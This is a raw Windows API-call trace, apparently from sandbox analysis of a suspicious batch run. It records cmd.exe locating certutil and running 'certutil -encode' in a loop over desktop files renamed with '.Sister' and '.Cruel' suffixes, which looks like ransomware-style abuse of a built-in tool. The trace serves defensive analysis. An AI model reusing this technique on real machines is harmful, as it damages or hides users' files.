[0226.642] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0226.642] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0226.642] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0226.642] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0226.642] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0226.642] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0226.642] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0226.642] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0226.642] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0226.642] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0226.642] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0226.642] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0226.642] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0226.642] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0226.642] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0226.642] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0226.642] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0226.642] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0226.643] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0226.643] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0226.643] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0226.643] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0226.643] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0226.643] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0226.643] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0226.643] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0226.643] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0226.643] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0226.643] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0226.643] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0226.643] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0226.643] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0226.643] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0226.643] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0226.643] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0226.643] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0226.643] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0226.643] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0226.643] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0226.643] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0226.643] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0226.643] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0226.643] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0226.643] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0226.643] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0226.643] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0226.643] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0226.643] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0226.643] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0226.643] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0226.643] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0226.643] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0226.644] ??_V@YAXPEAX@Z () returned 0x1 [0226.644] GetProcessHeap () returned 0x21ed8c70000 [0226.644] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d19930 [0226.644] GetProcessHeap () returned 0x21ed8c70000 [0226.644] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xa2) returned 0x21ed8c95e70 [0226.644] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0226.644] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0226.644] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0226.644] GetProcessHeap () returned 0x21ed8c70000 [0226.644] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed92a10e0 [0226.644] SetErrorMode (uMode=0x0) returned 0x0 [0226.644] SetErrorMode (uMode=0x1) returned 0x0 [0226.644] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed92a10f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0226.644] SetErrorMode (uMode=0x0) returned 0x1 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed92a10e0, Size=0x52) returned 0x21ed92a10e0 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed92a10e0) returned 0x52 [0226.645] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0226.645] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5ff50 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c761a0 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c761a0, Size=0x1be) returned 0x21ed8c761a0 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c761a0) returned 0x1be [0226.645] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed9980e30 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980e30, Size=0x7e) returned 0x21ed9980e30 [0226.645] GetProcessHeap () returned 0x21ed8c70000 [0226.645] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980e30) returned 0x7e [0226.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.646] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.646] GetLastError () returned 0x2 [0226.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.646] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.647] GetLastError () returned 0x2 [0226.647] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0226.647] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0226.647] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0226.647] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0226.647] GetLastError () returned 0x2 [0226.648] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cbe0 [0226.648] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0226.648] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0226.648] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0226.648] ??_V@YAXPEAX@Z () returned 0x1 [0226.648] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0226.648] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0226.648] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0226.649] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0226.649] GetProcessHeap () returned 0x21ed8c70000 [0226.649] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45b30 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0226.649] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0226.650] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0226.650] GetProcessHeap () returned 0x21ed8c70000 [0226.650] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0226.650] GetProcessHeap () returned 0x21ed8c70000 [0226.651] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95780 [0226.651] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0226.651] _get_osfhandle (_FileHandle=1) returned 0x50 [0226.651] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0226.651] _get_osfhandle (_FileHandle=0) returned 0x4c [0226.651] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0226.652] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"i6gjWm0aNWU1xM.swf.Sister\" \"i6gjWm0aNWU1xM.swf.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1010, dwThreadId=0x12c8)) returned 1 [0226.663] CloseHandle (hObject=0xa8) returned 1 [0226.663] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0226.663] GetProcessHeap () returned 0x21ed8c70000 [0226.664] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0226.664] GetEnvironmentStringsW () returned 0x21ed9980080* [0226.664] GetProcessHeap () returned 0x21ed8c70000 [0226.664] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0226.664] FreeEnvironmentStringsA (penv="=") returned 1 [0226.664] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0228.377] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0228.377] CloseHandle (hObject=0xa4) returned 1 [0228.377] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0228.377] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0228.377] GetProcessHeap () returned 0x21ed8c70000 [0228.377] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0228.377] GetEnvironmentStringsW () returned 0x21ed93b0130* [0228.378] GetProcessHeap () returned 0x21ed8c70000 [0228.378] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed9980080 [0228.378] FreeEnvironmentStringsA (penv="=") returned 1 [0228.378] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0228.378] GetProcessHeap () returned 0x21ed8c70000 [0228.378] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0228.378] GetEnvironmentStringsW () returned 0x21ed9980080* [0228.378] GetProcessHeap () returned 0x21ed8c70000 [0228.378] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0228.378] FreeEnvironmentStringsA (penv="=") returned 1 [0228.378] GetProcessHeap () returned 0x21ed8c70000 [0228.378] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95780) returned 1 [0228.378] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0228.379] ??_V@YAXPEAX@Z () returned 0x1 [0228.379] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="jQv-1A.gif.Sister", cAlternateFileName="")) returned 1 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0c80, Size=0x30a) returned 0x21ed93b0c80 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b0c80) returned 0x30a [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68940 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68940, Size=0x58) returned 0x21ed8d68940 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68940) returned 0x58 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d689b0 [0228.379] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0228.379] GetProcessHeap () returned 0x21ed8c70000 [0228.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x34) returned 0x21ed8cc8c90 [0228.379] ??_V@YAXPEAX@Z () returned 0x1 [0228.380] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0228.380] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0228.380] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0228.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0228.380] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0228.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb25d778a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb25d778a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ce20 [0228.381] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0228.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="jQv-1A.gif.Sister", cAlternateFileName="JQV-1A~1.SIS")) returned 0x21ed8c7cc40 [0228.381] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0228.381] _wcsnicmp (_String1="JQV-1A~1.SIS", _String2="jQv-1A.gif.Sister", _MaxCount=0x11) returned 80 [0228.381] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0228.381] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0228.381] GetProcessHeap () returned 0x21ed8c70000 [0228.381] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45d70 [0228.381] ??_V@YAXPEAX@Z () returned 0x1 [0228.381] ??_V@YAXPEAX@Z () returned 0x1 [0228.381] GetProcessHeap () returned 0x21ed8c70000 [0228.381] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d689b0, Size=0x190) returned 0x21ed8d689b0 [0228.382] GetProcessHeap () returned 0x21ed8c70000 [0228.382] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d689b0) returned 0x190 [0228.382] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0228.382] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.382] GetFileType (hFile=0x50) returned 0x2 [0228.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0228.382] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0228.480] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.480] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0228.583] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0228.583] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0228.583] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0228.583] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0228.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.583] GetFileType (hFile=0x50) returned 0x2 [0228.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0228.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0228.652] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.652] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0228.761] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.761] GetFileType (hFile=0x50) returned 0x2 [0228.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0228.762] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0228.886] _get_osfhandle (_FileHandle=1) returned 0x50 [0228.886] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68950*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d68950*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0228.958] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"jQv-1A.gif.Sister\" \"jQv-1A.gif.Cruel\" ") returned 48 [0228.958] _get_osfhandle 